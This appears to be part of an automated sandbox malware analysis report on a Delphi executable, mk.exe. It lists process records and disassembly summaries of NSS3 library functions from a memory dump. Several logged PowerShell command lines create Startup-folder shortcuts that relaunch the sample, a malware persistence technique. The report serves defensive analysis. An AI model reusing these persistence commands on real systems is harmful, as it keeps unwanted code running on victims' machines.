File size:	9'308'672 bytes
MD5 hash:	B56761AD16C0E1CDD4765A130123DBC2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Has exited:	false

Show Windows behavior

Target ID:	62
Start time:	14:43:39
Start date:	13/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\syie.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1006034001\mk.exe'; $s.Save()"
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	63
Start time:	14:43:40
Start date:	13/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	64
Start time:	14:43:52
Start date:	13/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1006034001\mk.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\1006034001\mk.exe"
Imagebase:	0x400000
File size:	9'308'672 bytes
MD5 hash:	B56761AD16C0E1CDD4765A130123DBC2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Has exited:	false

Show Windows behavior

Target ID:	65
Start time:	14:43:53
Start date:	13/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xsap.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1006034001\mk.exe'; $s.Save()"
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	66
Start time:	14:43:53
Start date:	13/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Function 6C786E90 Relevance: 142.5, APIs: 71, Strings: 10, Instructions: 783stringmemoryCOMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6C8D2120,6C787E60), ref: 6C786EBC
TlsGetValue.KERNEL32 ref: 6C786EDF
EnterCriticalSection.KERNEL32(?), ref: 6C786EF3
PR_WaitCondVar.NSS3(000000FF), ref: 6C786F25

Part of subcall function 6C75A900: TlsGetValue.KERNEL32(00000000,?,6C8D14E4,?,6C6F4DD9), ref: 6C75A90F
Part of subcall function 6C75A900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6C75A94F

PR_Unlock.NSS3 ref: 6C786F68
PORT_ZAlloc_Util.NSS3(00000008), ref: 6C786FA9
TlsGetValue.KERNEL32 ref: 6C7870B4
EnterCriticalSection.KERNEL32(?), ref: 6C7870C8
PR_CallOnce.NSS3(6C8D24C0,6C7C7590), ref: 6C787104
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C787117
SECOID_Init.NSS3 ref: 6C787128
PORT_Alloc_Util.NSS3(00000057), ref: 6C78714E
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C78717F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7871A9
PR_NotifyAllCondVar.NSS3 ref: 6C7871CF
PR_Unlock.NSS3 ref: 6C7871DD
free.MOZGLUE(?), ref: 6C7871EE
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C787208
free.MOZGLUE(00000000), ref: 6C787221
free.MOZGLUE(00000001), ref: 6C787235
TlsGetValue.KERNEL32 ref: 6C78724A
EnterCriticalSection.KERNEL32(?), ref: 6C78725E
PR_NotifyCondVar.NSS3 ref: 6C787273
PR_Unlock.NSS3 ref: 6C787281
SECMOD_DestroyModule.NSS3(00000000), ref: 6C787291
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7872B1
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7872D4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7872E3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C787301
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C787310
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C787335
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C787344
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C787363
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C787372
PR_smprintf.NSS3(name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s",NSS Internal Module,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,6C8C0148,,defaultModDB,internalKeySlot), ref: 6C7874CC
free.MOZGLUE(00000000), ref: 6C787513
free.MOZGLUE(00000000), ref: 6C78751B
free.MOZGLUE(00000000), ref: 6C787528
free.MOZGLUE(00000000), ref: 6C78753C
free.MOZGLUE(00000000), ref: 6C787550
free.MOZGLUE(00000000), ref: 6C787561
free.MOZGLUE(00000000), ref: 6C787572
free.MOZGLUE(00000000), ref: 6C787583
free.MOZGLUE(00000000), ref: 6C787594
free.MOZGLUE(00000000), ref: 6C7875A2
SECMOD_LoadModule.NSS3(00000000,00000000,00000001), ref: 6C7875BD
free.MOZGLUE(00000000), ref: 6C7875C8
free.MOZGLUE(00000000), ref: 6C7875F1
PR_NewLock.NSS3 ref: 6C787636
SECMOD_DestroyModule.NSS3(00000000), ref: 6C787686
PR_NewLock.NSS3 ref: 6C7876A2

Part of subcall function 6C8398D0: calloc.MOZGLUE(00000001,00000084,6C760936,00000001,?,6C76102C), ref: 6C8398E5

PORT_ZAlloc_Util.NSS3(00000050), ref: 6C7876B6
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004), ref: 6C787707
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6C78771C
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6C787731
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,rdb:,00000004), ref: 6C78774A
DeleteCriticalSection.KERNEL32(?), ref: 6C787770
free.MOZGLUE(?), ref: 6C787779
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C78779A
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7877AC
PORT_Alloc_Util.NSS3(-0000000D), ref: 6C7877C4
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C7877DB
strrchr.VCRUNTIME140(?,0000002F), ref: 6C787821
PORT_Alloc_Util.NSS3(?), ref: 6C787837
memcpy.VCRUNTIME140(00000000,00000000,00000000), ref: 6C78785B
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C78786F
SECMOD_AddNewModuleEx.NSS3 ref: 6C7878AC
free.MOZGLUE(00000000), ref: 6C7878BE
SECMOD_AddNewModuleEx.NSS3 ref: 6C7878F3
free.MOZGLUE(00000000), ref: 6C7878FC
free.MOZGLUE(00000000), ref: 6C78791C

Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607AD
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607CD
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607D6
Part of subcall function 6C7607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C6F204A), ref: 6C7607E4
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,6C6F204A), ref: 6C760864
Part of subcall function 6C7607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C760880
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,6C6F204A), ref: 6C7608CB
Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(?,?,6C6F204A), ref: 6C7608D7
Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(?,?,6C6F204A), ref: 6C7608FB

Strings

Spac, xrefs: 6C787389
,defaultModDB,internalKeySlot, xrefs: 6C78748D, 6C7874AA
name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s", xrefs: 6C7874C7
NSS Internal Module, xrefs: 6C7874A2, 6C7874C6
kbi., xrefs: 6C787886
extern:, xrefs: 6C78772B
dll, xrefs: 6C78788E
dbm:, xrefs: 6C787716
sql:, xrefs: 6C7876FE
rdb:, xrefs: 6C787744

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: free$strlen$Value$Alloc_ModuleUtil$CriticalSectionstrncmp$CondEnterUnlockcallocmemcpy$CallDestroyErrorLockNotifyOnce$DeleteInitLoadR_smprintfWaitstrrchr
String ID: ,defaultModDB,internalKeySlot$NSS Internal Module$Spac$dbm:$dll$extern:$kbi.$name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s"$rdb:$sql:
API String ID: 3465160547-3797173233
Opcode ID: 59ceca15c006276a158a829ad79c7e4c5c4fc9edc457764d1f10a4d53debfb7e
Instruction ID: 3ccd983a67b0681726c4798d83db760b87975cbd48aaea6c23cfc07634b254a3
Opcode Fuzzy Hash: 59ceca15c006276a158a829ad79c7e4c5c4fc9edc457764d1f10a4d53debfb7e
Instruction Fuzzy Hash: 2852D4B1F022059BEF219F64DE097AA7BB4AF0630CF144434FE1AA6A51E731E954CBD1

Function 6C7ABFF0 Relevance: 75.9, APIs: 31, Strings: 12, Instructions: 624memorystringCOMMON

Download Yara Rule

APIs

PR_ExitMonitor.NSS3 ref: 6C7AC0C8

Part of subcall function 6C839440: LeaveCriticalSection.KERNEL32 ref: 6C8395CD
Part of subcall function 6C839440: TlsGetValue.KERNEL32 ref: 6C839622
Part of subcall function 6C839440: _PR_MD_NOTIFYALL_CV.NSS3 ref: 6C83964E

PR_EnterMonitor.NSS3 ref: 6C7AC0AE

Part of subcall function 6C839090: LeaveCriticalSection.KERNEL32 ref: 6C8391AA
Part of subcall function 6C839090: TlsGetValue.KERNEL32 ref: 6C839212
Part of subcall function 6C839090: _PR_MD_WAIT_CV.NSS3 ref: 6C83926B

Part of subcall function 6C760600: GetLastError.KERNEL32(?,?,?,?,?,6C7605E2), ref: 6C760642
Part of subcall function 6C760600: TlsGetValue.KERNEL32(?,?,?,?,?,6C7605E2), ref: 6C76065D
Part of subcall function 6C760600: GetLastError.KERNEL32 ref: 6C760678
Part of subcall function 6C760600: PR_snprintf.NSS3(?,00000014,error %d,00000000), ref: 6C76068A
Part of subcall function 6C760600: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C760693
Part of subcall function 6C760600: PR_SetErrorText.NSS3(00000000,?), ref: 6C76069D
Part of subcall function 6C760600: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00335406,?,?,?,?,?,6C7605E2), ref: 6C7606CA
Part of subcall function 6C760600: PR_SetError.NSS3(FFFFE8A9,00000000,?,?,?,?,?,6C7605E2), ref: 6C7606E6

PR_EnterMonitor.NSS3 ref: 6C7AC0F2
PR_ExitMonitor.NSS3 ref: 6C7AC10E
PR_ExitMonitor.NSS3 ref: 6C7AC081

Part of subcall function 6C839440: TlsGetValue.KERNEL32 ref: 6C83945B
Part of subcall function 6C839440: TlsGetValue.KERNEL32 ref: 6C839479
Part of subcall function 6C839440: EnterCriticalSection.KERNEL32 ref: 6C839495
Part of subcall function 6C839440: TlsGetValue.KERNEL32 ref: 6C8394E4
Part of subcall function 6C839440: TlsGetValue.KERNEL32 ref: 6C839532
Part of subcall function 6C839440: LeaveCriticalSection.KERNEL32 ref: 6C83955D

PR_EnterMonitor.NSS3 ref: 6C7AC068

Part of subcall function 6C839090: TlsGetValue.KERNEL32 ref: 6C8390AB
Part of subcall function 6C839090: TlsGetValue.KERNEL32 ref: 6C8390C9
Part of subcall function 6C839090: EnterCriticalSection.KERNEL32 ref: 6C8390E5
Part of subcall function 6C839090: TlsGetValue.KERNEL32 ref: 6C839116
Part of subcall function 6C839090: LeaveCriticalSection.KERNEL32 ref: 6C83913F

Part of subcall function 6C760600: GetProcAddress.KERNEL32(?,?), ref: 6C760623

_NSSUTIL_UTF8ToWide.NSS3(?), ref: 6C7AC14F
PR_LoadLibraryWithFlags.NSS3 ref: 6C7AC183
free.MOZGLUE(00000000), ref: 6C7AC18E
PR_LoadLibrary.NSS3(?), ref: 6C7AC1A3
PR_EnterMonitor.NSS3 ref: 6C7AC1D4
PR_ExitMonitor.NSS3 ref: 6C7AC1F3
PR_CallOnce.NSS3(6C8D2318,6C7ACA70), ref: 6C7AC210
PR_EnterMonitor.NSS3 ref: 6C7AC22B
PR_ExitMonitor.NSS3 ref: 6C7AC247
PR_EnterMonitor.NSS3 ref: 6C7AC26A
PR_ExitMonitor.NSS3 ref: 6C7AC287
PR_UnloadLibrary.NSS3(?), ref: 6C7AC2D0
PR_GetEnvSecure.NSS3(NSS_DEBUG_PKCS11_MODULE), ref: 6C7AC392
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C7AC3AB
PR_NewLogModule.NSS3(nss_mod_log), ref: 6C7AC3D1
PR_GetEnvSecure.NSS3(NSS_FORCE_TOKEN_LOCK), ref: 6C7AC782
PR_GetEnvSecure.NSS3(NSS_DISABLE_UNLOAD), ref: 6C7AC7B5
PR_UnloadLibrary.NSS3(?), ref: 6C7AC7CC
PR_SetError.NSS3(FFFFE097,00000000), ref: 6C7AC82E
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C7AC8BF
PORT_Alloc_Util.NSS3(?), ref: 6C7AC8D5
free.MOZGLUE(00000000), ref: 6C7AC900
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C7AC9C7
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C7AC9E5
free.MOZGLUE(00000000), ref: 6C7ACA5A

Strings

NSS_ReturnModuleSpecData, xrefs: 6C7AC275
FC_GetFunctionList, xrefs: 6C7AC098
NSS_DEBUG_PKCS11_MODULE, xrefs: 6C7AC38D
PKCS 11, xrefs: 6C7AC2F9, 6C7AC314
Vendor NSS FIPS Interface, xrefs: 6C7AC34A
NSS_FORCE_TOKEN_LOCK, xrefs: 6C7AC77D
NSC_ModuleDBFunc, xrefs: 6C7AC0FC
NSS_DISABLE_UNLOAD, xrefs: 6C7AC7B0
nss_mod_log, xrefs: 6C7AC3CC
FC_GetInterface, xrefs: 6C7AC054
NSC_GetInterface, xrefs: 6C7AC04F
NSC_GetFunctionList, xrefs: 6C7AC093

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Monitor$Value$Enter$CriticalExitSection$Error$LeaveLibrary$Alloc_SecureUtilfree$ArenaLastLoadUnloadstrcmp$AddressCallFlagsModuleOnceProcR_snprintfTextWideWithmemcpystrlen
String ID: FC_GetFunctionList$FC_GetInterface$NSC_GetFunctionList$NSC_GetInterface$NSC_ModuleDBFunc$NSS_DEBUG_PKCS11_MODULE$NSS_DISABLE_UNLOAD$NSS_FORCE_TOKEN_LOCK$NSS_ReturnModuleSpecData$PKCS 11$Vendor NSS FIPS Interface$nss_mod_log
API String ID: 4243957313-3613044529
Opcode ID: edc1dd41984df32345a7eae6275807ccfc878b8168d7d9adf9e2558229a98d45
Instruction ID: 339716ebc6dc22c61204f5ce3a9d17b17fa45b102db10035881a1a4d91aed3e2
Opcode Fuzzy Hash: edc1dd41984df32345a7eae6275807ccfc878b8168d7d9adf9e2558229a98d45
Instruction Fuzzy Hash: E342A1B1A002049FDF14DF95DA4AB5A7BB1FB45319F044238E8168BB21E736E916CFD1

Function 6C883FC0 Relevance: 70.5, APIs: 37, Strings: 3, Instructions: 485stringprocessCOMMON

Download Yara Rule

APIs

malloc.MOZGLUE(00000008), ref: 6C883FD5
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C883FFE
malloc.MOZGLUE(-00000003), ref: 6C884016
strpbrk.API-MS-WIN-CRT-STRING-L1-1-0(?,6C8BFC62), ref: 6C88404A
memset.VCRUNTIME140(?,0000005C,00000000), ref: 6C88407E
memset.VCRUNTIME140(?,0000005C,00000000), ref: 6C8840A4
memset.VCRUNTIME140(?,0000005C,00000000), ref: 6C8840D7
PR_SetError.NSS3(FFFFE890,00000000), ref: 6C884112
malloc.MOZGLUE(00000000), ref: 6C88411E
__p__environ.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0 ref: 6C88414D
PR_SetError.NSS3(FFFFE890,00000000), ref: 6C884160
free.MOZGLUE(?), ref: 6C88416C
malloc.MOZGLUE(?), ref: 6C8841AB
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,NSPR_INHERIT_FDS=,00000011), ref: 6C8841EF
qsort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,00000004,6C884520), ref: 6C884244
GetEnvironmentStrings.KERNEL32 ref: 6C88424D
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C884263
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C884283
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C8842B7
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C8842E4
malloc.MOZGLUE(00000002), ref: 6C8842FA
FreeEnvironmentStringsA.KERNEL32(?), ref: 6C884342
GetStdHandle.KERNEL32(000000F6), ref: 6C8843AB
GetStdHandle.KERNEL32(000000F5), ref: 6C8843B2
GetStdHandle.KERNEL32(000000F4), ref: 6C8843B9
FreeEnvironmentStringsA.KERNEL32(?), ref: 6C884403
PR_SetError.NSS3(FFFFE890,00000000), ref: 6C884410

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000000,00000000,00000000,00000044,?), ref: 6C88445E
CloseHandle.KERNEL32(?), ref: 6C88446B
free.MOZGLUE(?), ref: 6C884482
free.MOZGLUE(00000000), ref: 6C884492
free.MOZGLUE(00000000), ref: 6C8844A4
GetLastError.KERNEL32 ref: 6C8844B2
PR_SetError.NSS3(FFFFE896,00000000), ref: 6C8844BE
free.MOZGLUE(?), ref: 6C8844C7
free.MOZGLUE(00000000), ref: 6C8844D5
free.MOZGLUE(00000000), ref: 6C8844EA

Strings

=, xrefs: 6C8844F8
NSPR_INHERIT_FDS=, xrefs: 6C8841E9
D, xrefs: 6C884396

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: free$Errormallocstrlen$Handle$EnvironmentStringsmemset$Free$CloseCreateLastProcessValue__p__environqsortstrncmpstrpbrk
String ID: =$D$NSPR_INHERIT_FDS=
API String ID: 3116300875-3553733109
Opcode ID: 02cfa6ff28332b771196b6ae1b66737e4ea1843aa11cb1ce1b6f7e01c3ac9597
Instruction ID: 20f6edacda26cd72f31cdb70276b35cbfa6b7e58f86033b452df6047e9472ab0
Opcode Fuzzy Hash: 02cfa6ff28332b771196b6ae1b66737e4ea1843aa11cb1ce1b6f7e01c3ac9597
Instruction Fuzzy Hash: 52021676E063159FEB308F698A5075EBBB8AFC6308F240938D855A7F42D731A904CB91

Function 6C796D90 Relevance: 60.3, APIs: 33, Strings: 1, Instructions: 809COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,6C89A8EC,0000006C), ref: 6C796DC6
memcpy.VCRUNTIME140(?,6C89A958,0000006C), ref: 6C796DDB
memcpy.VCRUNTIME140(?,6C89A9C4,00000078), ref: 6C796DF1
memcpy.VCRUNTIME140(?,6C89AA3C,0000006C), ref: 6C796E06
memcpy.VCRUNTIME140(?,6C89AAA8,00000060), ref: 6C796E1C
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C796E38

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

PK11_DoesMechanism.NSS3(?,?), ref: 6C796E76
TlsGetValue.KERNEL32 ref: 6C79726F
EnterCriticalSection.KERNEL32(?), ref: 6C797283

Strings

!, xrefs: 6C797123

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: memcpy$Value$CriticalDoesEnterErrorK11_MechanismSection
String ID: !
API String ID: 3333340300-2657877971
Opcode ID: ca3aa0358fa286691e40e11472568cb6709aa424e7f825af19ddd9c7f45c07c2
Instruction ID: 308542ffa5ec354283845bb2f09da9896fcdcabb97360432bc6dd666d18b238c
Opcode Fuzzy Hash: ca3aa0358fa286691e40e11472568cb6709aa424e7f825af19ddd9c7f45c07c2
Instruction Fuzzy Hash: 5F729E75D052199FDF60DF28DD88B9ABBB5BF49308F1041A9D80DA7701EB31AA84CF91

Function 6C703C40 Relevance: 41.2, APIs: 20, Strings: 3, Instructions: 932COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C703C66
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(000000FD,?), ref: 6C703D04
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C703EAD
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C703ED7
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C703F74
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C704052
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C70406F
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000001), ref: 6C70410D
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011A47,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C70449C

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C704452, 6C704486, 6C7044EA, 6C704571, 6C704580, 6C70458F, 6C70475A, 6C7047FA
database corruption, xrefs: 6C704490, 6C7044F4, 6C704599, 6C704764, 6C704804
%s at line %d of [%.10s], xrefs: 6C704495, 6C7044F9, 6C70459E, 6C704769, 6C704809

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: _byteswap_ulong$sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 2597148001-598938438
Opcode ID: 19fc17f2725c4b5a3f92f8a789078a9b559da8161b9b549ca8337300fcc168dd
Instruction ID: b4e8528197be34531667114a7356d5bae3ce2144990a4329f25c2732274ff5de
Opcode Fuzzy Hash: 19fc17f2725c4b5a3f92f8a789078a9b559da8161b9b549ca8337300fcc168dd
Instruction Fuzzy Hash: 6482BDB4B00215DFCB14CF69C680B9AB7F2BF59318F2585A8D805ABB52D731EC42DB91

Function 6C7DAC30 Relevance: 39.5, APIs: 26, Instructions: 539memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6C7DACC4
PORT_ArenaAlloc_Util.NSS3(?,000040F4), ref: 6C7DACD5
memset.VCRUNTIME140(00000000,00000000,000040F4), ref: 6C7DACF3
SEC_ASN1EncodeInteger_Util.NSS3(?,00000018,00000003), ref: 6C7DAD3B
SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6C7DADC8
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C7DADDF
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C7DADF0

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C7DB06A
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C7DB08C
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C7DB1BA
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C7DB27C
